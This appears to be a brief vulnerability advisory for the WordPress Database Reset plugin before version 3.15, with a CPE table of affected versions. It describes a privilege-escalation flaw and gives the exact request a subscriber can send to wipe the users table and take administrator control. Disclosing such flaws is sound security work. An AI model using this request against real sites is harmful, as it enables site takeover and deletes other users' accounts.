This flaw “allowed any authenticated user, even those with minimal permissions, the ability to grant their account administrative privileges while dropping all other users from the table with a simple request.”
Login as a subscriber then send the following request: URL/wp-admin/admin.php?db-reset-tables%5B%5D=users&db-reset-code;=11111&db-reset-code-confirm;=11111
CPE | Name | Operator | Version |
---|---|---|---|
wordpress-database-reset | lt | 3.15 |